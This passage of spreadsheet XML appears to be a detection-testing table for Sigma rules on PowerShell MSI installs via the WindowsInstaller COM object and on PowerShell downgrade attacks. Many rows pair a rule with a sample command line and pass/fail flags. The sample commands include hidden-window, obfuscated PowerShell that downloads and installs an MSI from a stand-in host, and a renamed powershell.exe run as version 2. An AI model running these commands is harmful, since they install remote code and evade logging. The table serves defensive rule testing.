          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2004" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2004" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2004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2004" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2004" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2004" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2004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004" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2004" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2005" ht="15.75" customHeight="1" s="42">
      <c r="A2005" s="43" t="n"/>
      <c r="B2005" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2005" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2005" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2005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2005" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2005" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2005" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2005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005" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2005" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2006" ht="15.75" customHeight="1" s="42">
      <c r="A2006" s="43" t="n"/>
      <c r="B2006" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2006" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2006" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2006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2006" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2006" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2006" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2006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006" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2006" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2007" ht="15.75" customHeight="1" s="42">
      <c r="A2007" s="43" t="n"/>
      <c r="B2007" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2007" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2007" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2007" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F2007" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2007" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2007" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2007" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J2007" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2007" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2008" ht="15.75" customHeight="1" s="42">
      <c r="A2008" s="43" t="n"/>
      <c r="B2008" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2008" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2008" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2008" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WIndoWStYle Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F2008" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2008" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2008" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2008" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J2008" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2008" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2009" ht="15.75" customHeight="1" s="42">
      <c r="A2009" s="43" t="n"/>
      <c r="B2009" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2009" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2009" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2009" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wInDowsTyLe Hidden -COmMANd "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F2009" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2009" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2009" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2009" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J2009" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2009" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2010" ht="15.75" customHeight="1" s="42">
      <c r="A2010" s="43" t="n"/>
      <c r="B2010" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2010" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2010" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2010" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WInDowSTYLE Hidden -cOmmaND "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F2010" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2010" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2010" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2010" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J2010" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2010" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2011" ht="15.75" customHeight="1" s="42">
      <c r="A2011" s="43" t="n"/>
      <c r="B2011" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2011" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2011" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2011" s="4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2011" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2011" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2011" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2011" s="44" t="n"/>
      <c r="J2011" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2011" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2012" ht="15.75" customHeight="1" s="42">
      <c r="A2012" s="43" t="n"/>
      <c r="B2012" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2012" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2012" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2012" s="4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2012" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2012" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2012" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2012" s="44" t="n"/>
      <c r="J2012" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2012" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2013" ht="15.75" customHeight="1" s="42">
      <c r="A2013" s="43" t="n"/>
      <c r="B2013" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2013" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2013" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2013" s="4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2013" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2013" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2013" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2013" s="44" t="n"/>
      <c r="J2013" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2013" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2014" ht="15.75" customHeight="1" s="42">
      <c r="A2014" s="43" t="n"/>
      <c r="B2014" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C2014" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D2014" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E2014" s="4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2014" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2014" s="4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2014" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2014" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2015" ht="15.75" customHeight="1" s="42">
      <c r="A2015" s="43" t="n"/>
      <c r="B2015" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C2015" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D2015" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E2015" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F2015" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2015" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2015" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2015" s="43" t="n"/>
      <c r="J2015" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2015" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2016" ht="15.75" customHeight="1" s="42">
      <c r="A2016" s="43" t="n"/>
      <c r="B2016" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C2016" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D2016" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E2016" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F2016" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2016" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2016" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2016" s="43" t="n"/>
      <c r="J2016" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2016" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2017" ht="15.75" customHeight="1" s="42">
      <c r="A2017" s="43" t="n"/>
      <c r="B2017" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C2017" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D2017" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E2017" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F2017" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2017" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2017" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2017" s="43" t="n"/>
      <c r="J2017" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2017" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2018" ht="15.75" customHeight="1" s="42">
      <c r="A2018" s="43" t="n"/>
      <c r="B2018" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2018" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2018" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2018" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -version 2</t>
        </is>
      </c>
      <c r="F2018" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2018" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2018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2018" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2018" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2019" ht="15.75" customHeight="1" s="42">
      <c r="A2019" s="43" t="n"/>
      <c r="B2019" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2019" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2019" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2019" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -vErSIoN 2</t>
        </is>
      </c>
      <c r="F2019" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2019" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2019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2019" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2019" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2020" ht="15.75" customHeight="1" s="42">
      <c r="A2020" s="43" t="n"/>
      <c r="B2020" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2020" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2020" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2020" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -VeRsIOn 2</t>
        </is>
      </c>
      <c r="F2020" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2020" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2020" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2020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2020" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2020" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2021" ht="15.75" customHeight="1" s="42">
      <c r="A2021" s="43" t="n"/>
      <c r="B2021" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2021" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2021" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2021" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\updater.exe &amp;&amp; C:\Temp\updater.exe -vErSioN 2</t>
        </is>
      </c>
      <c r="F2021" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2021" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2021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2021" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2021" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2022" ht="15.75" customHeight="1" s="42">
      <c r="A2022" s="43" t="n"/>
      <c r="B2022" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2022" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2022" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2022" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -v 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2022" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2022" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2022" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2022" s="43" t="n"/>
      <c r="J2022" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2022" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2023" ht="15.75" customHeight="1" s="42">
      <c r="A2023" s="43" t="n"/>
      <c r="B2023" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2023" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2023" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2023" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Version 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2023" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2023" s="44" t="n"/>
      <c r="J2023" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2023" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2024" ht="15.75" customHeight="1" s="42">
      <c r="A2024" s="43" t="n"/>
      <c r="B2024" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2024" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2024" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2024" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -V 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2024" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2024" s="43" t="n"/>
      <c r="J2024" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2024" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2025" ht="15.75" customHeight="1" s="42">
      <c r="A2025" s="43" t="n"/>
      <c r="B2025" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2025" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2025" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2025" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Version 2.0 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2025" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2025" s="44" t="n"/>
      <c r="J2025" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2025" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2026" ht="15.75" customHeight="1" s="42">
      <c r="A2026" s="43" t="n"/>
      <c r="B2026" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2026" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2026" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2026" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -VerSIoN 2.0 -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2026" s="44" t="n"/>
      <c r="J2026" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2026" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2027" ht="15.75" customHeight="1" s="42">
      <c r="A2027" s="43" t="n"/>
      <c r="B2027" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2027" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2027" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2027" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -cOmmAnd "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2027" s="44" t="n"/>
      <c r="J2027" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2027" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2028" ht="15.75" customHeight="1" s="42">
      <c r="A2028" s="43" t="n"/>
      <c r="B2028" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2028" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2028" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2028" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -VERsION 2.0 -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2028" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2028" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2028" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2028" s="44" t="n"/>
      <c r="J2028" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2028" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2029" ht="15.75" customHeight="1" s="42">
      <c r="A2029" s="43" t="n"/>
      <c r="B2029" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2029" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2029" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2029" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -c "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2029" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2029" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2029" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2029" s="43" t="n"/>
      <c r="J2029" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2029" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2030" ht="15.75" customHeight="1" s="42">
      <c r="A2030" s="43" t="n"/>
      <c r="B2030" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2030" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2030" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2030" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -ComMAnd "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2030" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2030" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2030" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2030" s="44" t="n"/>
      <c r="J2030" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2030" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2031" ht="15.75" customHeight="1" s="42">
      <c r="A2031" s="43" t="n"/>
      <c r="B2031" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2031" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2031" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2031" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -VErsION 2.0 -COmManD "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2031" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2031" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2031" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2031" s="44" t="n"/>
      <c r="J2031" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2031" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2032" ht="15.75" customHeight="1" s="42">
      <c r="A2032" s="43" t="n"/>
      <c r="B2032" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C2032" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D2032" s="44" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E2032" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -VerSiOn 2.0 -coMmAND "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F2032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2032" s="44" t="n"/>
      <c r="J2032" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2032" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2033" ht="15.75" customHeight="1" s="42">
      <c r="A2033" s="43" t="n"/>
      <c r="B2033" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
